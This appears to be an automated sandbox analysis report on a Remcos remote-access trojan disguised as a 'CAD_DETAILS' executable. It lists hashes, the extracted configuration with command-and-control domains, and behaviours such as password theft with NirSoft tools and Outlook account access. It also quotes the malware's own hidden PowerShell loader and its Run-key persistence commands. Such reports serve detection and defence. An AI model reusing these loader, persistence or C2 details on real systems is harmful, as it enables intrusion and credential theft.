Analysis
-
max time kernel
147s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-01-2025 13:47
Static task
static1
Behavioral task
behavioral1
Sample
CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe
Resource
win10v2004-20241007-en
General
-
Target
CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe
-
Size
643KB
-
MD5
5cba30723bcacc171aa6417869f5981c
-
SHA1
a8abaf40ae64d44f9055d4dd3df2f91ac393ecc1
-
SHA256
d20dae11fd9de533d5ba84666b26dbf233161d991643d2de08fd043699cddbcc
-
SHA512
6ebb1d4f664933e6f063759c2a615feb72ef250b5a0ec0f3f9775868bacc661931ee64e9ae943db6f58a43b08eac7350a1f511ebf97620356bc504e81d78c431
-
SSDEEP
12288:llLIJdKsaouLbYCjUnmITaCQwN44mlIc4G66Jg1KCe4sEftmU3BgKiC:lSJaouPYComqa6fcx66Jg16EfthGC
Malware Config
Extracted
remcos
SPREDE
oaziamaka111.duckdns.org:4689
oaziamaka111.duckdns.org:4688
oaziamaka222.duckdns.org:4689
oaziamaka222.duckdns.org:4688
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
aleopty.dat
-
keylog_flag
false
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
deokloksgb-NAYJ41
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
- startup_value
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/2112-80-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/2752-79-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral2/memory/3168-85-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/2112-80-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/2752-79-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 1500 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Kldevare = "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\\Software\\Decade\\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)" reg.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 22 4964 msiexec.exe 24 4964 msiexec.exe 26 4964 msiexec.exe 28 4964 msiexec.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 4964 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1500 powershell.exe 4964 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 4964 set thread context of 2752 4964 msiexec.exe 101 PID 4964 set thread context of 2112 4964 msiexec.exe 102 PID 4964 set thread context of 3168 4964 msiexec.exe 103 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 2084 reg.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 1500 powershell.exe 2752 msiexec.exe 2752 msiexec.exe 3168 msiexec.exe 3168 msiexec.exe 2752 msiexec.exe 2752 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 1500 powershell.exe 4964 msiexec.exe 4964 msiexec.exe 4964 msiexec.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description pid Process Token: SeDebugPrivilege 1500 powershell.exe Token: SeIncreaseQuotaPrivilege 1500 powershell.exe Token: SeSecurityPrivilege 1500 powershell.exe Token: SeTakeOwnershipPrivilege 1500 powershell.exe Token: SeLoadDriverPrivilege 1500 powershell.exe Token: SeSystemProfilePrivilege 1500 powershell.exe Token: SeSystemtimePrivilege 1500 powershell.exe Token: SeProfSingleProcessPrivilege 1500 powershell.exe Token: SeIncBasePriorityPrivilege 1500 powershell.exe Token: SeCreatePagefilePrivilege 1500 powershell.exe Token: SeBackupPrivilege 1500 powershell.exe Token: SeRestorePrivilege 1500 powershell.exe Token: SeShutdownPrivilege 1500 powershell.exe Token: SeDebugPrivilege 1500 powershell.exe Token: SeSystemEnvironmentPrivilege 1500 powershell.exe Token: SeRemoteShutdownPrivilege 1500 powershell.exe Token: SeUndockPrivilege 1500 powershell.exe Token: SeManageVolumePrivilege 1500 powershell.exe Token: 33 1500 powershell.exe Token: 34 1500 powershell.exe Token: 35 1500 powershell.exe Token: 36 1500 powershell.exe Token: SeDebugPrivilege 3168 msiexec.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4964 msiexec.exe -
Suspicious use of WriteProcessMemory 25 IoCs
description pid Process procid_target PID 4804 wrote to memory of 1500 4804 CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe 83 PID 4804 wrote to memory of 1500 4804 CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe 83 PID 4804 wrote to memory of 1500 4804 CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe 83 PID 1500 wrote to memory of 4964 1500 powershell.exe 93 PID 1500 wrote to memory of 4964 1500 powershell.exe 93 PID 1500 wrote to memory of 4964 1500 powershell.exe 93 PID 1500 wrote to memory of 4964 1500 powershell.exe 93 PID 4964 wrote to memory of 4300 4964 msiexec.exe 97 PID 4964 wrote to memory of 4300 4964 msiexec.exe 97 PID 4964 wrote to memory of 4300 4964 msiexec.exe 97 PID 4300 wrote to memory of 2084 4300 cmd.exe 100 PID 4300 wrote to memory of 2084 4300 cmd.exe 100 PID 4300 wrote to memory of 2084 4300 cmd.exe 100 PID 4964 wrote to memory of 2752 4964 msiexec.exe 101 PID 4964 wrote to memory of 2752 4964 msiexec.exe 101 PID 4964 wrote to memory of 2752 4964 msiexec.exe 101 PID 4964 wrote to memory of 2752 4964 msiexec.exe 101 PID 4964 wrote to memory of 2112 4964 msiexec.exe 102 PID 4964 wrote to memory of 2112 4964 msiexec.exe 102 PID 4964 wrote to memory of 2112 4964 msiexec.exe 102 PID 4964 wrote to memory of 2112 4964 msiexec.exe 102 PID 4964 wrote to memory of 3168 4964 msiexec.exe 103 PID 4964 wrote to memory of 3168 4964 msiexec.exe 103 PID 4964 wrote to memory of 3168 4964 msiexec.exe 103 PID 4964 wrote to memory of 3168 4964 msiexec.exe 103
Processes
-
C:\Users\Admin\AppData\Local\Temp\CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe"C:\Users\Admin\AppData\Local\Temp\CAD_DETAILS_ Copies_6761fa19c0f9d_293874738_IMG__REF2632737463773364_221.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4804 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden "$Topskuddene=gc -Raw 'C:\Users\Admin\AppData\Local\Temp\terrorproof\smuttersens\Panics.End';$Flygtningebaggrund=$Topskuddene.SubString(72585,3);.$Flygtningebaggrund($Topskuddene)"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1500 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe"3⤵
- Blocklisted process makes network request
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4964 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kldevare" /t REG_EXPAND_SZ /d "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\Software\Decade\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\reg.exeREG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Kldevare" /t REG_EXPAND_SZ /d "%Dishonorer% -windowstyle 1 $Provianterendes=(Get-Item 'HKCU:\Software\Decade\').GetValue('Uprightman');%Dishonorer% ($Provianterendes)"5⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2084
-
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\mfvinmk"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2752
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wzaanfvngi"4⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:2112
-
-
C:\Windows\SysWOW64\msiexec.exeC:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\gbgloxgpuqalx"4⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3168
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
4KB
MD516dfb23eaa7972c59c36fcbc0946093b
SHA11e9e3ff83a05131575f67e202d352709205f20f8
SHA25636c49c94327c8cadcad4c0d2b3a8f5162fc7bb86624923484476c5f7b960bc4c
SHA512a8b38b5e7bf886b78c5c7f01234b44647a252d4dfbcc06c99b863f8e160e3cfc151b2a83b8b49e09d13e8547419467da4bffbb8dee5fc6740032eb7c839d89dc
-
Filesize
308KB
MD595456efa53e67771a7a366a1729330a5
SHA17c6753470c3f2a1919af9608040e31404eb15955
SHA2564e5986d80aa60a80b07731921a0dbb905f663de679dbc4bfe897ad27fe04555d
SHA51236bd759c9e49100db6739293ccbb1508b260b5866813d085403e489ec40e86019cfccdebb6a134afdd3fe42410c53a57865ef904eefd7cd33b9944f7cb4f3d13
-
Filesize
70KB
MD5fa9db15fb8638e539838260c0f09078b
SHA1adcb4f9c75b0120d8f0369edd71d75397bd9507f
SHA256648a811ffe8215aa2f12cdfcbed2ca0efa438a628a0164e592508e56538bbd4b
SHA51224412e43da7b725aad0bf64347ac718573bd3c95409cb9a1c6f90f9abb474fae46583588b7eb9943d5be829b6466007fb28cefbad59b819d88064b30205b1153